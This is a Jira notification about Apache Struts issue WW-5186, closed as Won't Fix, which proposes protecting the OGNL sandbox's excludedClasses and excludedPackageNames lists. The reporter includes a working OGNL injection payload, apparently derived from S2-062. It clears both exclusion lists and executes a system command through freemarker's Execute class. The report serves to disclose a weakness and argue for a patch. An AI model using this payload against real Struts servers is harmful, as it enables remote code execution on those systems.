[
https://issues.apache.org/jira/browse/WW-5186?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Lukasz Lenart closed WW-5186.
-----------------------------
Resolution: Won't Fix
> protect excludedClasses and excludedPackageNames
> ------------------------------------------------
>
> Key: WW-5186
> URL: https://issues.apache.org/jira/browse/WW-5186
> Project: Struts 2
> Issue Type: Improvement
> Components: Core
> Affects Versions: 2.5.30, 6.0.0
> Reporter: tanli
> Priority: Major
> Time Spent: 10m
> Remaining Estimate: 0h
>
> protect excludedClasses and excludedPackageNames
> 1)use st062 exp below,attacker clean excludedPackageNames with
> {{'excluded'+'PackageNames'}}
> also worked.
>
> {code:java}
> %{
> (#request.a=#@org.apache.commons.collections.BeanMap@{}) +
> (#request.a.setBean(#request.get('struts.valueStack')) == true) +
> (#request.b=#@org.apache.commons.collections.BeanMap@{}) +
> (#request.b.setBean(#request.get('a').get('context'))) +
> (#request.c=#@org.apache.commons.collections.BeanMap@{}) +
> (#request.c.setBean(#request.get('b').get('memberAccess'))) +
> (#request.get('c').put('excluded'+'PackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()))
> +
> (#request.get('c').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()))
> +
> (#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'calc'}))
> } {code}
>
> 2)to protect struts i push a patch with
> [struts pull|https://github.com/apache/struts/pull/567]
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
